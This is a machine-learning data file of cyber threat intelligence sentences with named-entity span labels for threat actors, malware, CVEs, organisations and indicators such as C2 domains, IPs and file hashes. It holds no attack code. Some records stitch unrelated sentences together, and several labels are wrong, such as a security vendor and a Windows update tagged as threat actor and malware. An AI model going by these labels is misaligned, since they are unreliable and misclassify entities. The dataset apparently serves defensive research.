{"text": "C & C Communications Exfiltrating Device Data To communicate with its master , TrickMo ’ s code contains a hardcoded URL of the C & C server . Emotet is a type of general-purpose malware that evolved from a well-known banking Trojan , \" Cridex \" , which was first discovered in 2014 . During the summer of 2018 , HELIX KITTEN actors were observed targeting entities in the Middle East — of note , targets appeared to be located in Bahrain and Kuwait .", "spans": {"MALWARE: TrickMo": [[79, 86]], "TOOL: Emotet": [[143, 149]], "TOOL: banking Trojan": [[218, 232]], "TOOL: Cridex": [[237, 243]], "THREAT_ACTOR: HELIX KITTEN actors": [[313, 332]]}, "info": {"id": "cyberner_stix_train_002521", "source": "cyberner_stix_train"}}
{"text": "In addition to the continued evolution of the group ’s first stage tools , we have also noted APT28 : Leveraging zero-day vulnerabilities in Adobe Flash Player , Java , and Windows , including CVE-2015-1701 , CVE-2015-2424 , CVE-2015-2590 , CVE-2015-3043 , CVE-2015-5119 , and CVE-2015-7645 .", "spans": {"THREAT_ACTOR: APT28": [[94, 99]], "VULNERABILITY: zero-day": [[113, 121]], "ORGANIZATION: Adobe": [[141, 146]], "TOOL: Flash": [[147, 152]], "TOOL: Player": [[153, 159]], "TOOL: Java": [[162, 166]], "SYSTEM: Windows": [[173, 180]], "VULNERABILITY: CVE-2015-1701": [[193, 206]], "VULNERABILITY: CVE-2015-2424": [[209, 222]], "VULNERABILITY: CVE-2015-2590": [[225, 238]], "VULNERABILITY: CVE-2015-3043": [[241, 254]], "VULNERABILITY: CVE-2015-5119": [[257, 270]], "VULNERABILITY: CVE-2015-7645": [[277, 290]]}, "info": {"id": "cyberner_stix_train_002522", "source": "cyberner_stix_train"}}
{"text": "No other parts of the C2 infrastructure amongst these domains contained any overlapping artifacts .", "spans": {"TOOL: C2": [[22, 24]]}, "info": {"id": "cyberner_stix_train_002523", "source": "cyberner_stix_train"}}
{"text": "One of these files was deployed in a TEMP.Veles target ’s network .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[37, 47]]}, "info": {"id": "cyberner_stix_train_002524", "source": "cyberner_stix_train"}}
{"text": "On January 10 , 2020 , we used Shodan to search for Internet accessible servers running versions of SharePoint vulnerable to CVE-2019-0604 .", "spans": {"TOOL: Shodan": [[31, 37]], "TOOL: SharePoint": [[100, 110]], "VULNERABILITY: CVE-2019-0604": [[125, 138]]}, "info": {"id": "cyberner_stix_train_002525", "source": "cyberner_stix_train"}}
{"text": "The actor can even take his malicious activities to the next level by installing a remote application from a designated server , thus allowing him to install new malware once it is required . Gallmaker used lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange ( DDE ) protocol in order to gain access to victim machines . By targeting all of these organizations together , Suckfly could have had a much larger impact on India and its economy .", "spans": {"THREAT_ACTOR: Gallmaker": [[192, 201]]}, "info": {"id": "cyberner_stix_train_002526", "source": "cyberner_stix_train"}}
{"text": "The following are the DBs created and maintained by the RAT . The agroup targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy . 558.doc , 2.doc: 2869664d456034a611b90500f0503d7d6a64abf62d9f9dd432a8659fa6659a84 . CrowdStrike researchers replicated the exploit method attack on Exchange systems that had not received the November 8 , 2022 patch KB5019758 , but could not replicate the attack on systems that had received that patch .", "spans": {"THREAT_ACTOR: agroup": [[66, 72]], "ORGANIZATION: media": [[93, 98]], "THREAT_ACTOR: admin@338": [[117, 126]], "TOOL: remote access Trojans": [[184, 205]], "TOOL: Poison Ivy": [[214, 224]], "ORGANIZATION: government": [[235, 245]], "ORGANIZATION: financial firms": [[250, 265]], "ORGANIZATION: global economic": [[282, 297]], "FILEPATH: 558.doc": [[307, 314]], "FILEPATH: 2869664d456034a611b90500f0503d7d6a64abf62d9f9dd432a8659fa6659a84": [[324, 388]], "THREAT_ACTOR: CrowdStrike researchers": [[391, 414]], "VULNERABILITY: KB5019758": [[522, 531]]}, "info": {"id": "cyberner_stix_train_002527", "source": "cyberner_stix_train"}}
{"text": "The main reason for developers to choose SMS over traditional payments via Internet is that in the case with SMS no Internet connection is required . Another set of attacks called Operation Erebus leverages another Flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation . Additionally , the scope of organizations targeted by this group has expanded to not only include organizations within Saudi Arabia , but also a company in Qatar and government organizations in Turkey , Israel and the United States .", "spans": {"VULNERABILITY: Flash exploit": [[215, 228]], "VULNERABILITY: CVE-2016-4117": [[231, 244]], "ORGANIZATION: government organizations": [[477, 501]]}, "info": {"id": "cyberner_stix_train_002528", "source": "cyberner_stix_train"}}
{"text": "The OilRig group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries . \" IRIDIUM has hit more than 200 government agencies , oil and gas companies and technology companies , including Citrix Systems Inc \" , they said .", "spans": {"THREAT_ACTOR: OilRig group": [[4, 16]], "ORGANIZATION: financial": [[78, 87]], "ORGANIZATION: government": [[90, 100]], "ORGANIZATION: energy": [[103, 109]], "ORGANIZATION: chemical": [[112, 120]], "ORGANIZATION: telecommunications": [[123, 141]], "ORGANIZATION: government agencies": [[197, 216]], "ORGANIZATION: oil": [[219, 222]], "ORGANIZATION: gas companies": [[227, 240]], "ORGANIZATION: technology companies": [[245, 265]], "ORGANIZATION: Citrix Systems Inc": [[278, 296]]}, "info": {"id": "cyberner_stix_train_002529", "source": "cyberner_stix_train"}}
{"text": "However , several of the collected samples were a C++ variant of the Zebrocy downloader tool .", "spans": {"TOOL: C++": [[50, 53]], "MALWARE: Zebrocy": [[69, 76]]}, "info": {"id": "cyberner_stix_train_002530", "source": "cyberner_stix_train"}}
{"text": "Then it adds onTouchListener to this textView and is able to process every user tap . Volgmer is a backdoor Trojan designed to provide covert access to a compromised system . APT33 : 94526e2d1aca581121bd79a699a3bf5e4d91a4f285c8ef5ab2ab6e9e44783997 S-SHA2 PowerShell downloader ( registry.ps1 ) . Ideology", "spans": {"TOOL: Volgmer": [[86, 93]], "TOOL: backdoor Trojan": [[99, 114]], "THREAT_ACTOR: APT33": [[175, 180]], "MALWARE: 94526e2d1aca581121bd79a699a3bf5e4d91a4f285c8ef5ab2ab6e9e44783997 S-SHA2 PowerShell downloader": [[183, 276]], "MALWARE: registry.ps1": [[279, 291]]}, "info": {"id": "cyberner_stix_train_002531", "source": "cyberner_stix_train"}}
{"text": "However , our data suggests that there have been at least 2,729 infections between January 2016 and early April 2016 , with a peak in March of more than 1,100 infections . The Operation Aurora , named by McAfee and announced in January 2010 , and the WikiLeaks document disclosures of 2010 have highlighted the fact that external and internal threats are nearly impossible to prevent . Ssdeep : 24576:zXwOrRsTQlIIIIwIEuCRqKlF8kmh/ZGg4kAL/WUKN7UMOtcv : zgwR/lIIIIwI6RqoukmhxGgZ+WUKZUMv . Mandiant has tracked KillNet activity back to January 2022 , despite a claim by the collective ’s alleged founder that it began operations in 2021 .", "spans": {"ORGANIZATION: McAfee": [[204, 210]], "ORGANIZATION: WikiLeaks": [[251, 260]], "TOOL: Ssdeep": [[386, 392]], "ORGANIZATION: Mandiant": [[487, 495]]}, "info": {"id": "cyberner_stix_train_002532", "source": "cyberner_stix_train"}}
{"text": "It is unclear whether this means early samples were targeting Arabic speakers or if the developers behind it are fluent in Arabic . For a long time the Winnti group had been considered as a Chinese threat actor targeting gaming companies specifically . The buffer containing the ZxShell Dll in the new location is freed using the VirtualFree API function . FREEFIRE communicates to a hard - coded channel to retrieve commands and upload responses .", "spans": {"THREAT_ACTOR: Winnti group": [[152, 164]], "ORGANIZATION: gaming companies": [[221, 237]], "MALWARE: ZxShell": [[279, 286]], "TOOL: Dll": [[287, 290]], "MALWARE: FREEFIRE": [[357, 365]]}, "info": {"id": "cyberner_stix_train_002533", "source": "cyberner_stix_train"}}
{"text": "ORat — CTU researchers have only observed this basic loader tool in the context of BRONZE PRESIDENT intrusions .", "spans": {"MALWARE: ORat": [[0, 4]], "ORGANIZATION: CTU": [[7, 10]], "THREAT_ACTOR: BRONZE PRESIDENT": [[83, 99]]}, "info": {"id": "cyberner_stix_train_002534", "source": "cyberner_stix_train"}}
{"text": "For Google , Android security issues - even if not in the core operating code - are a reputation threat , and for Amazon , a product quality issue . Upon decrypting and executing , it drops two additional files wsc_proxy.exe (legitimate Avast executable) and a malicious DLL wsc.dll in the %TEMP% folder . C2 : psfir.sacreeflame.com .", "spans": {"ORGANIZATION: Google": [[4, 10]], "ORGANIZATION: Amazon": [[114, 120]], "MALWARE: wsc_proxy.exe": [[211, 224]], "MALWARE: wsc.dll": [[275, 282]], "TOOL: C2": [[306, 308]], "DOMAIN: psfir.sacreeflame.com": [[311, 332]]}, "info": {"id": "cyberner_stix_train_002535", "source": "cyberner_stix_train"}}
{"text": "The first sighting of three of the nine stolen certificates being used maliciously occurred in early 2014 .", "spans": {}, "info": {"id": "cyberner_stix_train_002536", "source": "cyberner_stix_train"}}
{"text": "Having the ability to move code from desktops to mobile platforms with no effort , like the eCommon.DLL demonstrates that malicious actors can create hybrid threats faster and with fewer resources involved than ever before . Password spraying , DNS tunneling , social engineering , and abuse of security testing frameworks are common tactics , particularly from threat groups operating in the Middle East . While North Korean cyber operations against specific countries may have been driven by diplomatic factors and perceived insults against Pyongyang , the application of increasingly restrictive and numerous financial sanctions against North Korea probably contributed to the formation of APT38 .", "spans": {"THREAT_ACTOR: groups": [[369, 375]], "ORGANIZATION: financial": [[612, 621]], "THREAT_ACTOR: APT38": [[693, 698]]}, "info": {"id": "cyberner_stix_train_002537", "source": "cyberner_stix_train"}}
{"text": "Nowadays , script kiddies can build a piece of malware that can create real havoc . Hackers are targeting high-tech companies as well as chemical and pharmaceutical companies . CopyKittens often uses the trial version of Cobalt Strike , a publicly available commercial software for \" Adversary Simulations and Red Team Operations \" .", "spans": {"THREAT_ACTOR: Hackers": [[84, 91]], "ORGANIZATION: high-tech companies": [[106, 125]], "ORGANIZATION: chemical": [[137, 145]], "ORGANIZATION: pharmaceutical": [[150, 164]], "THREAT_ACTOR: CopyKittens": [[177, 188]], "MALWARE: Cobalt Strike": [[221, 234]]}, "info": {"id": "cyberner_stix_train_002538", "source": "cyberner_stix_train"}}
{"text": "This group has used a large array of infection vectors , mostly revolving around drive-by downloads and spam . In the past , Scarlet Mimic has primarily targeted individuals who belong to these minority groups as well as their supporters , but we've recently found evidence to indicate the group also targets individuals working inside government anti-terrorist organizations .", "spans": {"THREAT_ACTOR: group": [[5, 10]], "THREAT_ACTOR: Scarlet Mimic": [[125, 138]], "ORGANIZATION: minority groups": [[194, 209]], "ORGANIZATION: supporters": [[227, 237]], "ORGANIZATION: anti-terrorist organizations": [[347, 375]]}, "info": {"id": "cyberner_stix_train_002539", "source": "cyberner_stix_train"}}
{"text": "The last step of the activation cycle is the download of a password-protected ZIP file . The group mainly targets the telecommunications and IT services sectors . Derusbi : Compile Date and Time : 2012-09-14 09:20:12 AM . But then , following an upsurge in attacks in the second half of 2014 , GReAT characterized MiniDuke , CosmicDuke and the actor ’s Nemesis Gemina project - targeting government , diplomatic , energy , military and telecom operators - as ‘ one of the world ’s most unusual APT operations ’ due to : • Its use of a customized backdoor written in Assembler using ‘ old school ’ virus writing techniques and habits • Stealthy transfer of updates as executables hidden inside GIF files ( a form of steganography )", "spans": {"THREAT_ACTOR: group": [[93, 98]], "ORGANIZATION: telecommunications": [[118, 136]], "ORGANIZATION: IT services sectors": [[141, 160]], "MALWARE: Derusbi": [[163, 170]], "ORGANIZATION: GReAT": [[294, 299]], "MALWARE: MiniDuke": [[314, 322]], "MALWARE: CosmicDuke": [[325, 335]], "ORGANIZATION: targeting government": [[378, 398]], "ORGANIZATION: diplomatic , energy , military and telecom operators": [[401, 453]]}, "info": {"id": "cyberner_stix_train_002540", "source": "cyberner_stix_train"}}
{"text": "Each time a rented malware reaches the end of its life it provides the opportunity for other actors a to take over the malware rental market-share . Attackers take advantage of that , along with their knowledge of military jargon and etiquette , to craft very convincing phishing emails . Based on details published in the DOJ complaint against North Korean programmer Park Jin Hyok , we know that APT38 and other cyber operators linked to TEMP.Hermit are associated with Lab 110 , an organization subordinate to or synonymous with the 6th Technical Bureau in North Korea 's Reconnaissance General Bureau ( RGB ) .", "spans": {"THREAT_ACTOR: Attackers": [[149, 158]], "ORGANIZATION: military": [[214, 222]], "THREAT_ACTOR: APT38": [[398, 403]], "THREAT_ACTOR: cyber operators": [[414, 429]], "THREAT_ACTOR: TEMP.Hermit": [[440, 451]], "ORGANIZATION: Lab 110": [[472, 479]], "ORGANIZATION: Reconnaissance General Bureau": [[575, 604]], "ORGANIZATION: RGB": [[607, 610]]}, "info": {"id": "cyberner_stix_train_002541", "source": "cyberner_stix_train"}}
{"text": "In the 2016 incident , the victim was compromised after connecting to a hotel Wi-Fi network .", "spans": {"TOOL: Wi-Fi network": [[78, 91]]}, "info": {"id": "cyberner_stix_train_002542", "source": "cyberner_stix_train"}}
{"text": "Mozilla ( Windows NT 6.1 ; WOW64 ) WinHttp/1.6.3.8 ( WinHTTP/5.1 ) like Gecko .", "spans": {"ORGANIZATION: Mozilla": [[0, 7]], "SYSTEM: Windows": [[10, 17]], "TOOL: Gecko": [[72, 77]]}, "info": {"id": "cyberner_stix_train_002543", "source": "cyberner_stix_train"}}
{"text": "] 205 [ . As we now know , by February 2013 the Dukes group had been operating MiniDuke and other toolsets for at least 4 and a half years . The first payload that is downloaded via the DownloadString method highlighted above , is a PowerShell one-liner that uses an IF statement to evaluate the architecture of the compromised system , and then downloads a additional payload from pastebin.com . In the case of the exploit method described here as OWASSRF , the endpoint is not used , in lieu , and the request will not be dropped .", "spans": {"THREAT_ACTOR: Dukes group": [[48, 59]], "TOOL: MiniDuke": [[79, 87]], "TOOL: DownloadString": [[186, 200]], "TOOL: PowerShell": [[233, 243]], "DOMAIN: pastebin.com": [[382, 394]]}, "info": {"id": "cyberner_stix_train_002544", "source": "cyberner_stix_train"}}
{"text": "The geographic distribution of these IP addresses ( image 8 , page 13 ) further supports our theory that the purpose of this OnionDuke variant was not targeted attacks against high-profile targets .", "spans": {"MALWARE: OnionDuke": [[125, 134]]}, "info": {"id": "cyberner_stix_train_002545", "source": "cyberner_stix_train"}}
{"text": "Antonov's group included Ivan Sergeyevich Yermakov and Senior Lieutenant Aleksey Viktorovich Lukashev , according to the indictment , and they were responsible for targeting the email accounts that were exposed on the \" DCLeaks \" site prior to the election operations .", "spans": {"TOOL: email": [[178, 183]], "THREAT_ACTOR: DCLeaks": [[220, 227]]}, "info": {"id": "cyberner_stix_train_002546", "source": "cyberner_stix_train"}}
{"text": "To deliver their malware , the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882 , or documents with Ole2Link and SCT . The executable would install the real Ammyy product , but would also launch a file called either AmmyyService.exe or AmmyySvc.exe which contained the malicious payload .", "spans": {"THREAT_ACTOR: cyber criminals": [[31, 46]], "TOOL: spearphishing emails": [[51, 71]], "TOOL: attachments:": [[94, 106]], "TOOL: documents": [[117, 126], [209, 218]], "VULNERABILITY: CVE-2017-11882": [[189, 203]], "FILEPATH: AmmyyService.exe": [[340, 356]], "FILEPATH: AmmyySvc.exe": [[360, 372]]}, "info": {"id": "cyberner_stix_train_002547", "source": "cyberner_stix_train"}}
{"text": "] cashnow [ . RATs such as NjRat and infostealers like Lokibot were leveraging the same C2 infrastructure as that of the targeted attacks . Some functions in the ANEL sample utilize this , As these attacks continue to grow , security teams need tools to help save time and address the threats more effectively .", "spans": {"TOOL: RATs": [[14, 18]], "TOOL: NjRat": [[27, 32]], "TOOL: Lokibot": [[55, 62]], "MALWARE: ANEL": [[162, 166]], "ORGANIZATION: security teams": [[225, 239]]}, "info": {"id": "cyberner_stix_train_002548", "source": "cyberner_stix_train"}}
{"text": "] ir . In recent APT incidents , Dark Hydruns tend to adopt Office VBA macro instead of Office 0day vulnerability in the consideration of cost reduction . ScarCruft tools : 22aaf617a86e026424edb7c868742495 AV Remover .", "spans": {"THREAT_ACTOR: Dark Hydruns": [[33, 45]], "TOOL: Office VBA macro": [[60, 76]], "THREAT_ACTOR: ScarCruft": [[155, 164]], "FILEPATH: 22aaf617a86e026424edb7c868742495": [[173, 205]], "TOOL: AV Remover": [[206, 216]]}, "info": {"id": "cyberner_stix_train_002549", "source": "cyberner_stix_train"}}
{"text": "During one intrusion , the threat actors gained administrator access to all systems within a targeted business unit and installed their remote access tools on 80% of the hosts .", "spans": {}, "info": {"id": "cyberner_stix_train_002550", "source": "cyberner_stix_train"}}
{"text": "The threat actors used two publicly available techniques , an AppLocker whitelisting bypass and a script to inject shellcode into the userinit.exe process . The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat .", "spans": {"THREAT_ACTOR: actors": [[11, 17]], "MALWARE: userinit.exe": [[134, 146]], "MALWARE: Windows 10 Creators Update": [[161, 187]], "ORGANIZATION: Windows Defender ATP": [[223, 243]], "ORGANIZATION: SOC personnel": [[262, 275]]}, "info": {"id": "cyberner_stix_train_002551", "source": "cyberner_stix_train"}}
{"text": "The function “ NvMswt ” is a wrapper for the API function MsgWaitForMultipleObjects .", "spans": {}, "info": {"id": "cyberner_stix_train_002552", "source": "cyberner_stix_train"}}
{"text": "Apps of the Android/AdDisplay.Ashas family reported to Google by ESET Figure 2 . ESET recently uncovered a new addition to OceanLotus’s toolset targeting Mac OS . This URI is used with a new feature implemented in this version: the malware is able to perform screenshot (thanks to the GDI API) and uploads it thank to this URL .", "spans": {"MALWARE: Android/AdDisplay.Ashas": [[12, 35]], "ORGANIZATION: ESET": [[65, 69], [81, 85]], "THREAT_ACTOR: OceanLotus’s": [[123, 135]]}, "info": {"id": "cyberner_stix_train_002553", "source": "cyberner_stix_train"}}
{"text": "Although the complete list of Shamoon ’s victims is not public , Bloomberg reported that in one case , thousands of computers were destroyed at the headquarters of Saudi ’s General Authority of Civil Aviation , erasing critical data and bringing operations to a halt for several days .", "spans": {"MALWARE: Shamoon": [[30, 37]], "ORGANIZATION: Saudi ’s General Authority of Civil Aviation": [[164, 208]]}, "info": {"id": "cyberner_stix_train_002554", "source": "cyberner_stix_train"}}
{"text": "We were also able to link the FrozenCell 's Android infrastructure to numerous desktop samples that are part of the larger multi-platform attack . Symantec during 2012 linked the Elderwood Project to Operation Aurora ; Trojan.Naid and Backdoor.Moudoor were also used in Aurora , by the Elderwood Gang , and by Hidden Lynx . Because the commands are usually encoded and difficult to spell from memory , APT1 intruders typically do not type these strings , but instead copy and paste them into the HTML files . Instead , they can make money by marketing their services to other bad actors for a fee .", "spans": {"MALWARE: FrozenCell": [[30, 40]], "SYSTEM: Android": [[44, 51]], "ORGANIZATION: Symantec": [[147, 155]], "TOOL: Trojan.Naid": [[219, 230]], "MALWARE: Backdoor.Moudoor": [[235, 251]], "TOOL: Aurora": [[270, 276]], "THREAT_ACTOR: Elderwood Gang": [[286, 300]], "THREAT_ACTOR: Hidden Lynx": [[310, 321]], "THREAT_ACTOR: APT1": [[402, 406]], "TOOL: HTML": [[496, 500]]}, "info": {"id": "cyberner_stix_train_002555", "source": "cyberner_stix_train"}}
{"text": "It appears to have started in December 2015 and is still ongoing as of July 2016 . The name Mofang is based on the Mandarin verb , which means to imitate .", "spans": {"THREAT_ACTOR: Mofang": [[92, 98]]}, "info": {"id": "cyberner_stix_train_002556", "source": "cyberner_stix_train"}}
{"text": "The malicious apps reached an astonishing spread between 4.5 million and 18.5 million downloads . The samples Novetta obtained from the active Axiom infection were compiled in mid- to late 2014 and represent what Novetta is referring to as version 3.0 of the Winnti lineage . Otherwise , the plugin is added to an internal list . The directory choices and naming conventions of the Ruby script and second stage payloads indicated the threat actor placed significant priority into masquerading as legitimate files and applications .", "spans": {"ORGANIZATION: Novetta": [[110, 117], [213, 220]], "THREAT_ACTOR: Winnti": [[259, 265]], "MALWARE: Ruby script": [[382, 393]], "MALWARE: second stage payloads": [[398, 419]]}, "info": {"id": "cyberner_stix_train_002557", "source": "cyberner_stix_train"}}
{"text": "The samples sharing this overlap are modified versions of an open source Jabber/XMPP client called “ Conversations ” with some code additions . BlackEnergy is a highly dynamic threat actor and the current attacks in Ukraine indicate that destructive actions are on their main agenda , in addition to compromising industrial control installations and espionage activities . The fact that this victim visits North Korea makes its special and suggests that it may have valuable information about North Korean affairs .", "spans": {"SYSTEM: Jabber/XMPP": [[73, 84]], "THREAT_ACTOR: BlackEnergy": [[144, 155]]}, "info": {"id": "cyberner_stix_train_002558", "source": "cyberner_stix_train"}}
{"text": "If root access is obtained , the application downloads a malicious .apk file ( The Backdoor ) from the server and installs it as system application . Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability , however in late January 2018 when , paradoxically , newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability . APT10 is a constantly evolving , highly persistent China-based threat actor that has an ambitious and unprecedented collection programme against a broad spectrum of sectors , enabled by its strategic targeting .", "spans": {"THREAT_ACTOR: Patchwork": [[174, 183]], "VULNERABILITY: CVE-2017-0261": [[199, 212]], "VULNERABILITY: CVE-2015-2545": [[346, 359]], "THREAT_ACTOR: APT10": [[376, 381]]}, "info": {"id": "cyberner_stix_train_002559", "source": "cyberner_stix_train"}}
{"text": "It has not been confirmed whether these are from test devices or the devices of victims . The above network shows relationships between three tools used by Hidden Lynx during its VOHO campaign : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit . We have observed APT1 intruders logging in to WEBC2 servers and manually editing the HTML pages that backdoors will download . Usually , they ’d have to hope a successful attack leads to a ransom payment or some sort of other financial windfall .", "spans": {"TOOL: Trojan.Naid": [[195, 206]], "MALWARE: Backdoor.Moudoor": [[209, 225]], "TOOL: Backdoor.Hikit": [[232, 246]], "THREAT_ACTOR: APT1": [[266, 270]], "MALWARE: WEBC2": [[295, 300]], "TOOL: HTML": [[334, 338]]}, "info": {"id": "cyberner_stix_train_002560", "source": "cyberner_stix_train"}}
{"text": "If the response code from the C2 server is 200 , the malware decrypts the payload and loads it in memory .", "spans": {"TOOL: C2": [[30, 32]]}, "info": {"id": "cyberner_stix_train_002561", "source": "cyberner_stix_train"}}
{"text": "The adversaries modify publicly available tools such as ASPXSpy to remove identifying characteristics that network defenders use to identify web shells .", "spans": {"MALWARE: ASPXSpy": [[56, 63]], "TOOL: web shells": [[141, 151]]}, "info": {"id": "cyberner_stix_train_002562", "source": "cyberner_stix_train"}}
{"text": "Additional digests with links to Chrysaor As a result of our investigation we have identified these additional Chrysaor-related apps . We believe APT40 's emphasis on maritime issues and naval technology ultimately support China 's ambition to establish a blue-water navy . Winnti : infestexe.com 2018-11-07 08:46:44 https://www.facebook.com/infest.in.th . • Unauthorized network connections to MSSQL servers ( TCP/1433 ) and irregular or unauthorized authentication .", "spans": {"MALWARE: Chrysaor": [[33, 41]], "MALWARE: Chrysaor-related": [[111, 127]], "THREAT_ACTOR: APT40": [[146, 151]], "ORGANIZATION: naval technology": [[187, 203]], "THREAT_ACTOR: Winnti": [[274, 280]], "DOMAIN: infestexe.com": [[283, 296]], "URL: https://www.facebook.com/infest.in.th": [[317, 354]]}, "info": {"id": "cyberner_stix_train_002563", "source": "cyberner_stix_train"}}
{"text": "DLL side loading is often used to maintain persistence on the compromised system .", "spans": {"TOOL: DLL": [[0, 3]]}, "info": {"id": "cyberner_stix_train_002564", "source": "cyberner_stix_train"}}
{"text": "com.comarch.mobile com.jpm.sig.android com.konylabs.cbplpat by.belinvestbank no.apps.dnbnor com.arkea.phonegap com.alseda.bpssberbank com.belveb.belvebmobile com.finanteq.finance.ca pl.eurobank pl.eurobank2 pl.noblebank.mobile com.getingroup.mobilebanking hr.asseco.android.mtoken.getin pl.getinleasing.mobile com.icp.ikasa.getinon Operator X also took advantage of cultural idiosyncrasies in its target countries , for example , the regular and widely accepted use of personal Gmail accounts for work . Cyberwarfare : A deep dive into the latest Gamaredon Espionage Campaign . The memory dump file can be processed offline by the threat actor to extract credentials .", "spans": {"THREAT_ACTOR: Gamaredon": [[547, 556]]}, "info": {"id": "cyberner_stix_train_002565", "source": "cyberner_stix_train"}}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . In some cases , such as Russia , the target appears to be an embassy from one of the countries of this list .", "spans": {"VULNERABILITY: Carbanak": [[20, 28]], "THREAT_ACTOR: criminals": [[95, 104]], "ORGANIZATION: financial industry": [[145, 163]], "ORGANIZATION: embassy": [[260, 267]]}, "info": {"id": "cyberner_stix_train_002566", "source": "cyberner_stix_train"}}
{"text": "We deployed our IR team and technology and immediately identified two sophisticated adversaries on the network – COZY BEAR and FANCY BEAR .", "spans": {"ORGANIZATION: IR": [[16, 18]], "THREAT_ACTOR: COZY BEAR": [[113, 122]], "THREAT_ACTOR: FANCY BEAR": [[127, 137]]}, "info": {"id": "cyberner_stix_train_002567", "source": "cyberner_stix_train"}}
{"text": "His repository proves that he is indeed an Android developer , but it contained no publicly available code of the Ashas adware at the time of writing of this blogpost . The malware continues by creating a service named mssecsvc2.0 with a binary path pointing to the running module with the arguments -m security . SHA256 : 56f159cde3a55ae6e9270d95791ef2f6859aa119ad516c9471010302e1fb5634 .", "spans": {"SYSTEM: Android": [[43, 50]], "MALWARE: Ashas": [[114, 119]], "MALWARE: malware": [[173, 180]], "MALWARE: mssecsvc2.0": [[219, 230]], "FILEPATH: 56f159cde3a55ae6e9270d95791ef2f6859aa119ad516c9471010302e1fb5634": [[323, 387]]}, "info": {"id": "cyberner_stix_train_002568", "source": "cyberner_stix_train"}}
{"text": "henbox_2 Figure 1 Uyghurapps [ . These could be tools to circumvent internet censorship , such as Softether VPN 4.12” and psiphon3” , or Microsoft Office activators” . APT12 's targets are consistent with larger People 's Republic of China ( PRC ) goals .", "spans": {"MALWARE: Softether VPN 4.12”": [[98, 117]], "MALWARE: psiphon3”": [[122, 131]], "MALWARE: Microsoft Office activators”": [[137, 165]], "THREAT_ACTOR: APT12": [[168, 173]]}, "info": {"id": "cyberner_stix_train_002569", "source": "cyberner_stix_train"}}
{"text": "This is due to the fact that the implant needs to escalate privileges before performing social payload actions . Group's targets include high-profile entities such as parliaments , senates , top state offices and officials , political science scholars , military and intelligence agencies , ministries , media outlets , research centers , election commissions , Olympic organizations , large trading companies , and other unknown entities . Turla ’s espionage platform is mainly used against Windows machines , but has also been seen used against macOS and Linux machines .", "spans": {"THREAT_ACTOR: Group's": [[113, 120]], "ORGANIZATION: parliaments": [[167, 178]], "ORGANIZATION: senates": [[181, 188]], "ORGANIZATION: top state offices": [[191, 208]], "ORGANIZATION: officials": [[213, 222]], "ORGANIZATION: political science scholars": [[225, 251]], "ORGANIZATION: military": [[254, 262]], "ORGANIZATION: intelligence agencies": [[267, 288]], "ORGANIZATION: ministries": [[291, 301]], "ORGANIZATION: media outlets": [[304, 317]], "ORGANIZATION: research centers": [[320, 336]], "ORGANIZATION: election commissions": [[339, 359]], "ORGANIZATION: Olympic organizations": [[362, 383]], "ORGANIZATION: trading companies": [[392, 409]], "ORGANIZATION: unknown entities": [[422, 438]], "THREAT_ACTOR: Turla": [[441, 446]], "SYSTEM: Windows": [[492, 499]], "SYSTEM: macOS": [[547, 552]], "SYSTEM: Linux": [[557, 562]]}, "info": {"id": "cyberner_stix_train_002570", "source": "cyberner_stix_train"}}
{"text": "sms_grab : to upload periodically the SMS messages in the inbox to C2 server . Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 14 , 2017 , FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . The RAT attempts to download additional payloads and upload the information gathered during the reconnaissance phase . Possible locations are “ Config ” , “ Static ” , or “ Path ” followed by a file path .", "spans": {"ORGANIZATION: Microsoft": [[102, 111]], "VULNERABILITY: CVE-2017-11882": [[131, 145]], "ORGANIZATION: FireEye": [[166, 173]], "THREAT_ACTOR: attacker": [[186, 194]], "VULNERABILITY: Microsoft Office vulnerability": [[220, 250]], "ORGANIZATION: government organization": [[263, 286]], "TOOL: RAT": [[312, 315]]}, "info": {"id": "cyberner_stix_train_002571", "source": "cyberner_stix_train"}}
{"text": "After achieving root access , Gooligan downloads a new , malicious module from the C & C server and installs it on the infected device . Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . the variable v5 in pseudocode is a register operand ( cl ) Recently , concerns have grown regarding the rapid growth of commercial spyware tools , and the way in which they are being used against their intended victims .", "spans": {"MALWARE: Gooligan": [[30, 38]], "ORGANIZATION: Kaspersky": [[137, 146]], "THREAT_ACTOR: BlackOasis group": [[157, 173]], "VULNERABILITY: Adobe Flash Player zero-day vulnerability": [[191, 232]], "VULNERABILITY: CVE-2016-4117": [[235, 248]], "TOOL: FinSpy": [[295, 301]]}, "info": {"id": "cyberner_stix_train_002572", "source": "cyberner_stix_train"}}
{"text": "The most widely infected major Android versions are KitKat with 50 percent , followed by Jelly Bean with 40 percent . If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit . APT33 : 64.251.19.231 [REDACTED].ddns.net . Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": {"SYSTEM: Android": [[31, 38]], "SYSTEM: KitKat": [[52, 58]], "SYSTEM: Jelly Bean": [[89, 99]], "TOOL: DoublePulsar backdoor": [[125, 146]], "TOOL: SMB worm": [[173, 181]], "VULNERABILITY: Eternalblue SMBv1 exploit": [[226, 251]], "THREAT_ACTOR: APT33": [[254, 259]], "IP_ADDRESS: 64.251.19.231": [[262, 275]], "DOMAIN: [REDACTED].ddns.net": [[276, 295]]}, "info": {"id": "cyberner_stix_train_002573", "source": "cyberner_stix_train"}}
